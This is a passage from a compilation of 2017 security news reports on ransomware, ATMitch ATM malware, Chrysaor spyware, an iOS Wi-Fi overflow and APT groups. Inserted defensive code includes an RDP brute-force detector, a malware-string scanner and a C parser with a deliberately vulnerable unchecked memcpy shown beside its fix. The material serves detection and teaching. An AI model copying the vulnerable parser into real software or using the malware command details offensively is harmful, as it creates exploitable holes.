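        elif ev["event_id"] == SUCCESSFUL_LOGON and ip in flagged:
            alerts.append({"ip": ip, "kind": "success-after-bruteforce", "time": ev["time"],
                           "account": ev["account"], "accounts_tried": sorted(accounts[ip])})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(parse_log(SAMPLE_LOG)):
        print(alert)
```

The second alert is the one that matters for this attack model: a password guessed by hand is followed, minutes or hours later, by an interactive session in which the encryptor is run, so "success after a burst of failures" should page someone, while the burst alone is routine noise on any Internet-exposed RDP host. The single failed attempt from the second address is a user mistyping a password and correctly produces nothing.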

However, true professionals are also active on the playing field. They carefully select targets (major companies with a large number of network nodes), and organize attacks that can last weeks and go through several stages:

Searching for a victim
Studying the possibility of penetration
Penetrating the organization’s network by using exploits for popular software or Trojans on the infected network nodes
Gaining a foothold on the network and researching its topology
Acquiring the necessary rights to install the encryptor on all the organization’s nodes/servers
Installing the encryptor
Recently, we have written about one of these types of ransomware, PetrWrap, on our blog.

The screen of a machine infected with PetrWrap

Of special note is the software arsenal a few groups use to penetrate and establish themselves in an organization’s network. For example, one of the groups used open source exploits for the server software that was running on the victim organization’s server. Once the attackers had exploited this vulnerability, they installed an open source RAT called Pupy on the system.

Pupy RAT description

Once they had gained a foothold in the victim’s network, the attackers used the Mimikatz tool to acquire the necessary access rights, and then installed the encryptor across the network using PsExec.

Considering the above, we can conclude that the scenario of ransomware infection in a targeted attack differs significantly from the usual infection scenario (malicious email attachments, drive-by attacks, etc.). To ensure comprehensive security of an organization’s network, it is necessary to audit the software installed on all nodes and servers of the network. If any outdated software is discovered, it should be updated immediately. Additionally, network administrators should ensure all types of remote access are reliably protected.

Of special note is the fact that, in most cases, the targets of attacks are an organization’s servers, which means that they should be safeguarded by security measures. In addition, regular backups are imperative; they help bring the company’s IT infrastructure back to operational mode quickly and with minimal financial loss.


ATMitch: remote administration of ATMs
5.4.2017 Kaspersky Virus

In February 2017, we published research on fileless attacks against enterprise networks. We described the data collected during incident response in several financial institutions around the world, exploring how attackers moved through enterprise networks leaving no traces on the hard drives. The goal of these attackers was money, and the best way to cash out and leave no record of transactions is through the remote administration of ATMs. This second paper is about the methods and techniques that were used by the attackers in the second stage of their attacks against financial organizations – basically enabling remote administration of ATMs.

In June 2016, Kaspersky Lab received a report from a Russian bank that had been the victim of a targeted attack. During the heist, the criminals were able to gain control of the ATMs and upload malware to them. After cashing out, the malware was removed. The bank’s forensics specialists were unable to recover the malicious executables because of the fragmentation of a hard drive after the attack, but they were able to restore the malware’s logs and some file names.

The bank’s forensic team were able, after careful forensic analysis of the ATM’s hard drive, to recover the following files containing logs:

C:\Windows\Temp\kl.txt
C:\logfile.txt
In addition, they were able to find the names of two deleted executables. Unfortunately, they were not able to recover any of the contents:

C:\ATM\!A.EXE
C:\ATM\IJ.EXE
Within the log files, the following pieces of plain text were found:

[Date – Time]
[%d %m %Y – %H : %M : %S] > Entering process dispense.
[%d %m %Y – %H : %M : %S] > Items from parameters converted successfully. 4 40
[%d %m %Y – %H : %M : %S] > Unlocking dispenser, result is 0
[%d %m %Y – %H : %M : %S] > Catch some money, bitch! 4000000
[%d %m %Y – %H : %M : %S] > Dispense success, code is 0

As mentioned in the previous paper, based on the information from the log file we created a YARA rule to find a sample, in this case: MD5 cef6c2aa78ff69d894903e41a3308452. And we’ve found one. This sample was uploaded twice (from Kazakhstan and Russia) as “tv.dll”.

ATMitch: remote administration of ATMs

The malware, which we have dubbed ATMitch, is fairly straightforward. Once remotely installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank, the malware looks for the “command.txt” file that should be located in the same directory as the malware and created by the attacker. If found, the malware reads the one-character content of the file and executes the respective command:

‘O’ – Open dispenser
‘D’ – Dispense
‘I’ – Init XFS
‘U’ – Unlock XFS
‘S’ – Setup
‘E’ – Exit
‘G’ – Get Dispenser id
‘L’ – Set Dispenser id
‘C’ – Cancel
After execution, ATMitch writes the results of this command to the log file and removes “command.txt” from the ATM’s hard drive.
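The log fragment and the command list above are the artefacts a forensic team actually recovers, and the report says a YARA rule built from those strings is what located the sample. The following Python is an added example, not Kaspersky's YARA rule or any ATMitch code: it scores an unknown binary by how many of the quoted log-format strings it contains, and parses a recovered log into a dispense timeline with unlock results, dispense codes and the dispensed amount. The timestamps in the sample log, and the sample binary itself, are constructed; the message text is the one quoted in the article.

```python
import re
from typing import List, Tuple

# Log-format strings recovered from kl.txt / logfile.txt (quoted above). The
# hunt described in the article keyed a YARA rule on strings like these;
# several hits inside one unknown binary is the triage signal reproduced here.
ATMITCH_MARKERS = (
    b"Entering process dispense.",
    b"Items from parameters converted successfully.",
    b"Unlocking dispenser, result is",
    b"Dispense success, code is",
    b"command.txt",
)


def score_sample(data: bytes, min_hits: int = 2) -> Tuple[bool, List[str]]:
    """Return (is_suspicious, matched_strings) for an arbitrary file body."""
    hits = [m.decode() for m in ATMITCH_MARKERS if m in data]
    return len(hits) >= min_hits, hits


# One log record: "[<timestamp>] > <message>". The timestamp is kept as opaque
# text because only its strftime pattern, not its rendered form, is known.
LOG_LINE = re.compile(r"^\[(?P<ts>[^\]]+)\]\s*>\s*(?P<msg>.*)$")
TRAILING_INT = re.compile(r"(\d+)\s*$")


def summarize_dispense_log(text: str) -> dict:
    """Turn a recovered ATMitch log into a dispense timeline."""
    summary = {"dispense_count": 0, "unlock_results": [], "dispense_codes": [],
               "amounts": [], "timeline": []}
    for raw in text.splitlines():
        m = LOG_LINE.match(raw.strip())
        if not m:
            continue
        ts, msg = m.group("ts"), m.group("msg")
        summary["timeline"].append((ts, msg))
        tail = TRAILING_INT.search(msg)
        if msg.startswith("Entering process dispense"):
            summary["dispense_count"] += 1
        elif msg.startswith("Unlocking dispenser") and tail:
            summary["unlock_results"].append(int(tail.group(1)))
        elif msg.startswith("Dispense success") and tail:
            summary["dispense_codes"].append(int(tail.group(1)))
        elif "money" in msg and tail:
            # the amount line; the unit is whatever the dispenser firmware counts in
            summary["amounts"].append(int(tail.group(1)))
    return summary


# Constructed sample log: the message text is the one quoted in the article,
# the timestamps are made up in the "%d %m %Y - %H : %M : %S" shape the log used.
SAMPLE_LOG = """\
[05 04 2017 - 03 : 12 : 00] > Entering process dispense.
[05 04 2017 - 03 : 12 : 00] > Items from parameters converted successfully. 4 40
[05 04 2017 - 03 : 12 : 01] > Unlocking dispenser, result is 0
[05 04 2017 - 03 : 12 : 01] > Catch some money, bitch! 4000000
[05 04 2017 - 03 : 12 : 04] > Dispense success, code is 0
"""

# Constructed stand-in for an unknown binary: junk bytes with four marker strings inside.
SAMPLE_BINARY = (b"MZ\x90\x00" + bytes(range(64)) + ATMITCH_MARKERS[0] + b"\x00" * 16
                 + ATMITCH_MARKERS[2] + b"\x00" + ATMITCH_MARKERS[3] + b"\x00" * 8
                 + ATMITCH_MARKERS[4] + bytes(range(64)))

if __name__ == "__main__":
    print(score_sample(SAMPLE_BINARY))
    print(summarize_dispense_log(SAMPLE_LOG))
```

Requiring at least two markers keeps a lone "command.txt" (a perfectly ordinary file name) from flagging every file on the disk, while a binary that carries the dispense-log format strings has little legitimate reason to exist on an ATM. The log summary gives the incident team the count of dispense cycles and the amount per cycle straight from the artefacts the forensic team recovered.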

The sample “tv.dll” successfully retrieved in this case does not try to conceal itself within the system.

ATMitch: remote administration of ATMs

The malware’s command parser

The malware uses the standard XFS library to control the ATM. It should be noted that it works on every ATM that supports the XFS library (which is the vast majority).

Unfortunately, we were unable to retrieve the executables (!A.exe and IJ.exe, located in C:\ATM) from the ATM; only the file names were found as artefacts during the forensic analysis. We assume that these are the installer and uninstaller of the malware. It should also be noted that “tv.dll” contained one Russian-language resource.

Kaspersky Lab continues to monitor and track these kinds of threats and reiterates the need for whitelisting in ATMs as well as the use of anti-APT solutions in banking networks.


Android Chrysaor spyware went undetected for years
5.4.2017 securityaffairs Android

Chrysaor spyware is an Android surveillance malware that remained undetected for at least three years, NSO Group Technology is suspected to be the author.
Security experts at Google and Lookout have spotted an Android version of one of the most sophisticated mobile spyware families, known as Chrysaor, which remained undetected for at least three years. The experts were unable to analyse the threat earlier because of its smart self-destruction capabilities. The Chrysaor spyware has been found installed on fewer than three dozen Android devices.
Chrysaor was used in targeted attacks against journalists and activists, mostly located in Israel; other victims were in Georgia, Turkey, Mexico, the UAE and other countries.
Experts believe the Chrysaor espionage Android malware was developed by the Israeli surveillance firm NSO Group Technologies, the company we met when researchers spotted its Pegasus iOS spyware in the wild.
The Chrysaor Android spyware implements several features including:
Exfiltrating data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, Viber, and Kakao.
Controlling device remotely from SMS-based commands.
Recording Live audio and video.
Keylogging and Screenshot capture.
Disabling of system updates to prevent vulnerability patching.
Spying on contacts, text messages, emails and browser history.
Self-destruct to evade detection
chrysaor spyware
The surveillance firm NSO Group Technologies sells its surveillance technology to governments and law enforcement agencies worldwide, but privacy advocates and activists accuse the firm of also selling its malware to dictatorial regimes.

“Although the applications were never available in Google Play, we immediately identified the scope of the problem by using Verify Apps,” reads a blog post published by Google.

“We’ve contacted the potentially affected users, disabled the applications on affected devices, and implemented changes in Verify Apps to protect all users.”

The threat was hard to analyse because it has the ability to delete itself when it detects any suspicious activity that could be related to its detection.
“Pegasus for Android will remove itself from the phone if:

The SIM MCC ID is invalid
An “antidote” file exists
It has not been able to check in with the servers after 60 days
It receives a command from the server to remove itself
Researchers believe that Chrysaor APK has also been distributed via SMS-based phishing messages, just like Pegasus infection on iOS devices.” reads the analysis published by Lookout.
Chrysaor uses a well-known Android rooting exploit called Framaroot to root the device and gain full control over it.

The experts noticed that the Chrysaor spyware dates back to 2014, which means that NSO Group may have since discovered zero-day vulnerabilities in Android and implemented the exploit code in the latest version of Chrysaor.

Lookout published a detailed analysis of the Chrysaor spyware titled “Pegasus for Android: Technical Analysis and Findings of Chrysaor.”


Update Your Apple Devices to iOS 10.3.1 to Avoid Being Hacked Over Wi-Fi
5.4.2017 thehackernews Apple
Less than a week after Apple released iOS 10.3 with over 100 bug fixes and security enhancements, the company has just pushed an emergency patch update – iOS 10.3.1 – to address a few critical vulnerabilities, one of which could allow hackers to "execute arbitrary code on the Wi-Fi chip."
The vulnerability, identified as CVE-2017-6975, was discovered by Google's Project Zero staffer Gal Beniamini, who noted on Twitter that more information about the flaw would be provided tomorrow.
Apple also did not provide any technical details on the flaw, but urged iPhone, iPad and iPod Touch users to update their devices as soon as possible.
In the security note accompanying iOS 10.3.1, Apple describes the issue as a stack buffer overflow vulnerability, which the company addressed by improving input validation.
A stack buffer overflow occurs when data written to a buffer on the execution stack exceeds the memory reserved for it, overwriting adjacent memory and potentially allowing an attacker to execute malicious code remotely.
The flaw allows an attacker, within range, to execute malicious code on the phone's Wi-Fi chip.
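The "input validation" fix Apple describes is the classic remedy for this bug class: check an untrusted length against the destination buffer before copying. The following is an added, constructed example that is not Apple's or Broadcom's code and does not reproduce the CVE-2017-6975 bug; it shows a generic frame parser (one length byte followed by a payload, a made-up format) in its unchecked form next to the hardened form that validates the length field against both the stack buffer's capacity and the number of bytes actually received.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed frame format (an assumption for this example): one length byte
   followed by that many payload bytes. The parser copies the payload into a
   fixed-size stack buffer, the pattern behind many stack buffer overflows in
   packet-handling code such as Wi-Fi firmware. */
#define MAX_PAYLOAD 32

enum parse_status { PARSE_OK = 0, PARSE_TOO_SHORT = -1, PARSE_TOO_LONG = -2 };

/* Vulnerable form: trusts the attacker-controlled length byte. A frame whose
   length byte exceeds MAX_PAYLOAD makes memcpy write past the stack buffer.
   Kept only for contrast; never call it with untrusted input. */
int parse_frame_unchecked(const uint8_t *frame, size_t frame_len,
                          uint8_t *out, size_t *out_len)
{
    uint8_t payload[MAX_PAYLOAD];
    if (frame_len < 1) return PARSE_TOO_SHORT;
    size_t n = frame[0];
    memcpy(payload, frame + 1, n);   /* no check that n <= MAX_PAYLOAD */
    memcpy(out, payload, n);
    *out_len = n;
    return PARSE_OK;
}

/* Hardened form: validates the length field against the buffer capacity and
   the bytes actually received before any copy takes place. */
int parse_frame_checked(const uint8_t *frame, size_t frame_len,
                        uint8_t *out, size_t *out_len)
{
    uint8_t payload[MAX_PAYLOAD];
    if (frame_len < 1) return PARSE_TOO_SHORT;
    size_t n = frame[0];
    if (n > MAX_PAYLOAD) return PARSE_TOO_LONG;     /* would overflow payload[] */
    if (n > frame_len - 1) return PARSE_TOO_SHORT;  /* would read past the frame */
    memcpy(payload, frame + 1, n);
    memcpy(out, payload, n);
    *out_len = n;
    return PARSE_OK;
}

/* Builds a constructed frame whose length byte may deliberately disagree with
   the number of payload bytes present. Returns total bytes written, 0 on error. */
size_t build_frame(uint8_t *buf, size_t buf_cap, uint8_t len_byte,
                   size_t payload_bytes, uint8_t fill)
{
    if (buf_cap < 1 + payload_bytes) return 0;
    buf[0] = len_byte;
    memset(buf + 1, fill, payload_bytes);
    return 1 + payload_bytes;
}

/* Runs the hardened parser over three constructed frames: a well-formed one,
   one whose length byte claims more than MAX_PAYLOAD, and one whose length
   byte claims more bytes than were received. Returns the number of checks
   that produced the expected status (3 when everything behaves). */
int run_selfcheck(void)
{
    uint8_t frame[64], out[64];
    size_t out_len = 0, fl;
    int passed = 0;

    fl = build_frame(frame, sizeof frame, 16, 16, 0x41);
    if (parse_frame_checked(frame, fl, out, &out_len) == PARSE_OK && out_len == 16) passed++;

    fl = build_frame(frame, sizeof frame, 200, 40, 0x42);   /* oversized claim */
    if (parse_frame_checked(frame, fl, out, &out_len) == PARSE_TOO_LONG) passed++;

    fl = build_frame(frame, sizeof frame, 20, 5, 0x43);     /* truncated frame */
    if (parse_frame_checked(frame, fl, out, &out_len) == PARSE_TOO_SHORT) passed++;

    return passed;
}

int main(void)
{
    printf("hardened parser: %d of 3 constructed frames handled as expected\n",
           run_selfcheck());
    return 0;
}
```

The unchecked version is shown only to make the missing checks visible; compiling with `-fstack-protector-strong` (GCC/Clang) would turn an overflow in it into an abort rather than silent corruption, but it is the explicit length check, not the canary, that removes the bug.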
The vulnerability appears to affect iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation, and later devices running the iOS 10.3 operating system.
It's worth mentioning that iPhone 5 and iPhone 5C were Apple's last iPhone handsets to have a 32-bit processor with Apple A6 system on a chip. Since iPhone 5S has a 64-bit processor, it is not affected by the issue.
For more technical details about the flaw, you will have to wait until tomorrow, when Beniamini will release a detailed blog post describing the bug and its impact on Apple users.
With the iOS 10.3 release, an over-the-air download for 32-bit Apple devices was not available. This has also been changed with the iOS 10.3.1 update, which brings back support for the iPhone 5 and 5C as well as the fourth-generation iPad -- the only remaining 32-bit Apple devices.
The iOS 10.3.1 update can be downloaded over-the-air via Settings → General → Software Update on your iOS device.
Apple users running iOS 10.3 should be able to see the iOS 10.3.1 update; tap the "Download and Install" button to install it.


Ecuador's New President Warns Assange Not to 'Meddle'

4.4.2017 securityweek BigBrothers
Ecuador's President-elect Lenin Moreno warned Julian Assange on Tuesday not to meddle in the country's politics, after the WikiLeaks founder taunted a rival candidate following his loss.

Moreno's election victory Sunday was a relief for Assange, who has been holed up in Ecuador's London embassy since 2012 to avoid arrest.

The socialist president-elect's conservative rival, Guillermo Lasso, had vowed to kick Assange out of the embassy.

But Moreno had some stern words after Assange took to Twitter to celebrate Lasso's loss.

"Mr Julian Assange must respect the condition (of asylum) he is in and not meddle in Ecuadoran politics," he said at a news conference.

As results showed Lasso losing on election night, Assange had exuberantly turned around the right-wing candidate's threat to expel him within 30 days.

"I cordially invite Lasso to leave Ecuador within 30 days (with or without his tax haven millions)," he tweeted -- a reference to allegations the ex-banker has money stashed in offshore accounts.

Assange fled to the embassy to avoid arrest and extradition to Sweden, where he faces a rape allegation.

The 45-year-old Australian, who denies the allegation, says he fears Sweden would send him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents in 2010.

Outgoing President Rafael Correa, a fiery critic of the US, granted Assange asylum, and Moreno has vowed to uphold it.

Assange's case has returned to the spotlight since WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and her Democratic party.

That created an awkward situation for the Ecuadoran government, which responded by temporarily restricting his internet access.


New RAT Uses Popular Sites for Command and Control

4.4.2017 securityweek Virus
A newly discovered remote administration tool (RAT) uses popular legitimate websites for its command and control (C&C) communication and for the exfiltration of data, Talos researchers say.

Dubbed ROKRAT, the tool is distributed via email with a malicious Hangul Word Processor (HWP) document and targets victims in Korea, where the Office alternative is highly popular. Researchers found that one of the malicious spear phishing emails was sent from the email server of Yonsei, a private university in Seoul. To add legitimacy to the email, the attackers used the contact email of the Korea Global Forum as the sender’s address.

The malicious HWP document contained an embedded Encapsulated PostScript (EPS) object aimed at exploiting a well-known vulnerability (CVE-2013-0808) to download a binary masquerading as a .jpg file. When the file is decoded and executed, the ROKRAT malware is installed on the victim’s machine, Talos explains.

The RAT shows increased complexity by using legitimate websites such as Twitter, Yandex, and Mediafire as its C&C communication and exfiltration platforms. Not only are these websites difficult to block globally within organizations, but they also use HTTPS connectivity, which makes it difficult to identify specific patterns.

“One of the samples analyzed only uses Twitter to interact with the RAT, while the second one additionally uses the cloud platforms: Yandex and Mediafire. The Twitter tokens we were able to extract are the same in both variants. There is obvious ongoing effort to add features to this RAT to allow for more sophisticated levels of attacks,” Talos notes.

Upon analysis, the security researchers discovered that the RAT doesn’t work on Windows XP systems and also packs detection evasion capabilities, as it checks the compromised system for a series of tools used for malware analysis or within sandbox environments. Should such tools be discovered, the malware jumps to a fake function which generates dummy HTTP traffic.

For communication with the C&C platforms, the malware uses 12 hardcoded tokens (7 different Twitter API tokens, 4 Yandex tokens, and one Mediafire account). The malware checks the last message on the Twitter timeline to receive orders and can also tweet; and can download and execute files or upload stolen documents to disks in the Yandex cloud or Mediafire.

The malware also packs keylogging capabilities, and one of the samples was also observed taking screenshots of the infected systems, researchers say.

The actor behind this campaign is a motivated one, Talos notes. The RAT is innovative, using novel communication channels that are difficult to contain within organizations. Furthermore, the malware includes a series of exotic features, such as the ability to perform requests to legitimate websites (Amazon and Hulu) if executed in a sandbox.

“This investigation shows us once again that South Korean interests sophisticated threat actors. In this specific case, the actor compromised a legitimate email address of a big forum organized by a university in Seoul in order to forge the spear phishing email which increased the chance of success. And we know that it was a success, during the writing of the article we identified infected systems communicating with the command & control previously mentioned,” Talos concludes.


NoMoreRansom Expands with New Decryptors, Partners

4.4.2017 securityweek Virus
NoMoreRansom, a project launched in 2016 by Europol, the Dutch National Police, Kaspersky Lab and Intel Security (now once again McAfee) has published its latest progress report. NoMoreRansom collects the available ransomware decryption tools into a single portal that victims can use to recover encrypted files without having to pay the criminals.

Since the last Europol update in December 2016, the project's decryption library has been supplemented by the addition of 15 new decryption tools. The catalogue of project partners has expanded by 30 to 76 public and private members, including the law enforcement agencies of Australia, Belgium, Israel, South Korea, Russia and Ukraine; and Interpol. SentinelOne and Verizon Enterprise Solutions are among the new private members.

The full list of available decryption tools can be found here, while the project members can be found here.

According to Europol, 10,000 ransomware victims from all over the world have regained their files through NoMoreRansom since the last December update. Statistics show that most visitors to the platform come from Russia, the Netherlands, the United States, Italy and Germany.

One of the new decryptors, provided by Bitdefender, rescues files from the Bart family of ransomware. "The tool," says Bitdefender, "is a direct result of successful collaboration between Bitdefender, Europol and Romanian police, supporting the 'No More Ransom' initiative kick started by Europol's European Cybercrime Centre."

Unlike other ransomware families, Bart does not require an internet connection to encrypt the victim's files, although one is required to receive the decryption key from the attacker's C&C server. The malware doesn't function if the computer's language is detected as Russian, Belorussian, or Ukrainian -- "most probably," suggests Bitdefender, "because it was written by a Russian speaking hacker."

The developers of Bart are the same criminal gang as those behind the Dridex and Locky ransomware strains.

Losses to ransomware continue to increase, rising by 300% from 2015 to 2016 to an estimated total of $1 billion. Estimates for 2017 indicate that the threat is still growing.


Kantara Initiative Assists With EU Privacy and GDPR Issues

4.4.2017 securityweek Privacy
The US-based Kantara Initiative announced today that it has joined the European Trust Foundation to help its non-EU government and corporate members engage with Europe on pan-jurisdiction federated digital identity, trust and privacy initiatives.

The advent of the General Data Protection Regulation (GDPR) turns Kantara's development of good business practices into legal requirements for any enterprise that has a single customer within the European Union. The new alliance will make it easier for US business to engage with the European Commission over such issues.

There are still fundamental misconceptions in the common understanding of the GDPR: firstly, that it only involves European companies; and secondly, that it solely concerns the protection of personal data from being hacked. Neither is true. Any company anywhere in the world that trades with Europe is affected; and data protection now involves far more than the protection of data. GDPR shifts the emphasis from company security to involved customer protection: secure customer relations are now a focus.

The issue is demonstrated by GDPR's 'consent' requirements. For a business to process personal data, it must now obtain consent, defined in article 4(11) as "any freely given, specific, informed and unambiguous indication of the data subject's wishes by which he or she by statement or by a clear affirmative action, signifies agreement to the processing of personal data relating to him or her."

The detail, requiring explicit informed consent (tick boxes and obscure T&Cs are no longer sufficient) will require changes to business practices. But consent can also be withdrawn -- and that will require changes to business processes. Commercial enterprises will need to manage consent as effectively as they manage identity; and indeed, the two become woven together.

This is where Kantara comes in. Its Consent Receipt Specification is a record of consent provided to an individual at the time the consent is given. The purpose is effectively to verify a consent contract, but it also provides a mechanism for the withdrawal of that consent. Coupled with a second evolving Kantara specification, User Managed Access (UMA) -- which enables the user to control how his or her data is shared -- these new initiatives could help provide a solution to the GDPR consent requirements.

Kantara's new relationship with the European Trust Foundation, which has a history of working closely with the European Commission, will help US consent mechanisms be accepted as adequate for the GDPR. But it is not just a one-way matter of compliance. It doesn't simply provide part of the legal basis for the transfer of personal data out of the EU; it is also part of the legal basis for making automated decisions relating to that personal information.

Consent receipts and user managed access are not simply a GDPR solution, they are good practices for the modern world. User trust in vendors' use of PII is low. If that can be improved so that secure customer relations can replace old-style hidden and obfuscated personal data collection, then new avenues for business will emerge.

In Kantara's own words, "When individuals are forced to sign organization-centric privacy policies/ terms of use, then this places limitations on the information that will be shared. If such constraints were removed, and capabilities built on the side of the individual, then new, rich information will flow -- including actual demand data (as opposed to derived/ predicted demand)."

But whatever solutions to GDPR requirements are chosen by US (or any non-EU) business, they will need to be accepted as adequate by the European Union -- and this is the aim of the new relationship between Kantara and the European Trust Foundation. "The European Trust Foundation aims to provide a valuable service to Kantara members located outside of Europe by helping to streamline the engagement process with the EU," said Colin Wallis, executive director, Kantara Initiative. "The foundation and organizations like Kantara act as a 'staging area' to help expedite the process of gathering information and presenting a common voice for non-EU countries to approach and engage with the EU on GDPR."


Google Announces New Accounts Sign-in Rules

4.4.2017 securityweek Safety
Google on Monday announced the rollout of a new Accounts sign-in page and of a series of updates to the policies that 3rd-party Single Sign-On (SSO) providers should comply with.

Starting on April 5, 2017, users will benefit from an updated experience when securely signing into their accounts, courtesy of a new Google Accounts login page. The new design, Google says, is meant to make the browser login experience consistent across computers, phones and tablets.

This change, Google also announced, is expected to impact organizations that use third-party applications within their networks, as well as those using a third-party SSO provider. “We recommend contacting your developer(s) or SSO provider to see if any updates are necessary,” Google says.

In a separate announcement, the Internet giant revealed that the changes affect Google and 3rd-party applications on iOS, mobile browsers on iOS and Android, and web browsers (Chrome, Firefox and other modern browsers).

Starting April 5, users of 3rd-party SSO providers will be better informed about the account they’re authenticating with as well as the permissions they’re granting to applications. Android applications using the standard authentication libraries already prompt users to select the appropriate account, meaning that these changes won’t impact them either, the company reveals.

“It’s important that your users are presented with account information and credential consent, and apps should make this process easy and clear. One new change that you may now see is that only non-standard permission requests will be presented in the secondary consent screen in your application,” Google explains.

At the moment, app permissions requested by an application are displayed together, but users should have greater visibility into permissions being requested beyond the standard “email address” and “profile” consent, Google says. If additional permissions are requested by the app, a secondary consent screen is displayed.

Users will also have greater visibility into the 3rd-party application’s name and will also be able to click-through to get the developer’s contact information. Thus, application developers should use public-facing email addresses so that users could easily contact them for support or assistance.

“If your application may also be used by G Suite customers that employ a 3rd-party Single Sign-On (SSO) service, we recommend that you utilize the hd and/or login_hint parameters, if applicable. Even with the changes to the 3rd-party SSO auth flow, these parameters will be respected if provided. You can review the OpenID Connect page in the documentation for more information,” Google also notes.

G Suite users may notice redirection when signing into 3rd-party SSO providers as well. When no accounts are signed in, the user will be prompted to confirm the account after signing in to the 3rd-party SSO provider, which is meant to ensure that they’re signed in with the correct G Suite account. Users automatically opt into “email address” and “profile” consent, but will be redirected back to the application once they consent to any additional non-standard permissions that may be requested.

If the user is already signed in to one or more accounts matching the hd hint, the Account Chooser will display all the accounts and the user will have to select the appropriate G Suite account. Next, the user will be redirected to the 3rd-party SSO provider, then back to the application.


Turla Linked to One of the Earliest Cyberespionage Operations

4.4.2017 securityweek Virus
Researchers at Kaspersky Lab and King’s College London have identified a link between the Russian-speaking threat actor Turla and Moonlight Maze, one of the earliest known state-sponsored cyberespionage operations carried out in the ‘90s.

In around 1996, a threat group believed to be located in Russia had started spying on organizations in the United States, including the Pentagon, the Department of Energy and NASA. The actor had stolen vast amounts of sensitive information from universities, military and research organizations. The activities of the group, dubbed Moonlight Maze, were first made public in 1999 and detailed last year at Kaspersky’s SAS conference by Thomas Rid of King's College London.

Experts have dug further into Moonlight Maze’s activities and at this year’s SAS conference they presented evidence linking the threat actor to Turla. If Turla does in fact turn out to be an evolution of Moonlight Maze, that would make it one of the earliest and longest cyber espionage operations, along with the NSA’s Equation Group, which is also believed to have been active since the mid ‘90s.

Turla is also known as Waterbug, KRYPTON and Venomous Bear, and some of its primary tools are tracked as Turla (Snake and Uroburos) and Epic Turla (Wipbot and Tavdig). The threat actor has been linked to the Agent.BTZ malware, which indicates that Turla may have been active since as early as 2006.

Kaspersky and King’s College London researchers found precious information after learning of David Hedges, a now-retired administrator who got to watch Moonlight Maze in action when one of his servers was compromised by the threat group back in 1998. Hedges had allowed the attackers to use his server in order to help the Metropolitan Police in London and the FBI track the team’s activities.

Hedges still had the old server, which recorded data between 1998 and 1999, allowing the researchers to analyze the tools used at the time by Moonlight Maze.

The analysis showed that the attackers compiled most of their tools on UNIX operating systems such as Solaris and IRIX. One of the third-party tools they used was LOKI2, an open-source backdoor released in 1996.

LOKI2 has provided a link to Penquin Turla, a Linux backdoor identified by Kaspersky Lab in 2014. Penquin Turla’s code was compiled for Linux kernel versions released in 1999, and the malware was based on LOKI2, which had been designed for covert data exfiltration.

Researchers believe the Penquin Turla codebase was primarily developed between 1999 and 2004, but the malware was also spotted in the 2011 attack on Swiss defense firm RUAG, and a new sample was uploaded to the VirusTotal service in March 2017. The experts’ theory is that the hackers dusted off the old code and reused it in attacks aimed at highly secure entities whose defenses may have been more difficult to breach using the group’s typical Windows toolset.

While the use of LOKI2 source code and other similarities do provide a link between Turla and Moonlight Maze, more evidence is needed before researchers can say with certainty that the former is an evolution of the latter.

Further evidence may be found in data collected from a campaign dubbed Storm Cloud. The Wall Street Journal reported in 2001 that this operation had also involved LOKI2, but researchers currently have little information on Storm Cloud.


Kaspersky Links Global Cyber Attacks to North Korea

4.4.2017 securityweek BigBrothers
ST. MAARTEN – SECURITY ANALYST SUMMIT – Just days after reports surfaced that U.S. prosecutors were preparing to point fingers at the North Korean government for directing the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016, Kaspersky Lab unveiled new details on the hacking group believed to be conducting the attack and several others.

Considered to be one of the largest and most successful cyber heists ever, Kaspersky said there is a “high chance” that the attacks were conducted by Lazarus, a North Korea-linked hacking group responsible for a series of regular and destructive attacks, including the devastating attack against Sony Pictures in late 2014.

On Monday at Kaspersky Lab’s Security Analyst Summit in St. Maarten, the Moscow-based security firm shared its findings on the malicious tools the group uses and how it operates.

The company also said that it managed to disrupt other potential Lazarus operations attempting to steal funds from unnamed banks in Southeast Asia and Europe.

While Kaspersky’s team believes Lazarus to be a large group focused on infiltration and espionage operations, the company said a “substantially smaller” unit within the group, responsible for financial profit, exists, which they have dubbed Bluenoroff.

In February, researchers discovered an attack aimed at banks in Poland that was linked back to Lazarus. As part of the operation, the attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) so that malware would be served to its visitors.

“The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many,” Kaspersky explained. “Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.”

Since December 2015, Kaspersky Lab was able to detect malware samples relating to Lazarus group activity that appeared in financial institutions, casinos, software developers for investment companies and crypto-currency businesses in Korea, Bangladesh, India, Vietnam, Indonesia, Costa Rica, Malaysia, Poland, Iraq, Ethiopia, Kenya, Nigeria, Uruguay, Gabon, Thailand and several other countries.

Recent forensic analysis conducted by a Kaspersky Lab partner of a C2 server in Europe used by the Lazarus/Bluenoroff group also provided some interesting North Korea-related discoveries.

“Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2,” Kaspersky Lab's Global Research & Analysis Team explained in a blog post. “Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.”

Other firms, including BAE Systems and Symantec, previously had linked the Bangladesh theft to a series of cyber-attacks on the U.S. financial system and the hacking of Sony Pictures.

Still an Active Threat

Kaspersky’s team believes that Lazarus will remain one of the biggest threats to banking, finance and other firms for the next few years.

“We’re sure they’ll come back soon. In all, attacks like the ones conducted by Lazarus group show that a minor misconfiguration may result in a major security breach, which can potentially cost a targeted business hundreds of millions of dollars in loss,” said Vitaly Kamluk, head of the Global Research and Analysis Team APAC at Kaspersky Lab. “We hope that chief executives from banks, casinos and investment companies around the world will become wary of the name Lazarus.”

North Korea Cyber Attack Attribution

